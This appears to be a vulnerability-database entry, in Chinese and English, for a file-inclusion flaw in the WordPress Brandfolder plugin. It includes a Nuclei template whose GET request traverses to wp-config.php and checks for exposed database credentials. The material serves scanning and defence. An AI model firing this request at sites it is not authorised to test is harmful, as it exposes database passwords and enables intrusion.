brandfolder-lfi: Wordpress Brandfolder - Remote/Local File Inclusion

日期: 2025-08-01 | 影响软件: Wordpress Brandfolder | POC: 已公开

漏洞描述

WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.

PoC代码[已公开]

id: brandfolder-lfi

info:
  name: Wordpress Brandfolder - Remote/Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Brandfolder allows remote attackers to access arbitrary files that reside on the local and remote server and disclose their content.
  reference:
    - https://www.exploit-db.com/exploits/39591
    - https://cxsecurity.com/issue/WLB-2016030120
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,rfi,edb,wordpress,wp-plugin,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206b81348c7d468c6c0239185fd5c717f7d0fd97a100653ffeca1fea42e1fafb0002203497606c984edc3013f62ecc6e0a62f4ab431b529c46ba6b6e3fabb72e8246e4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐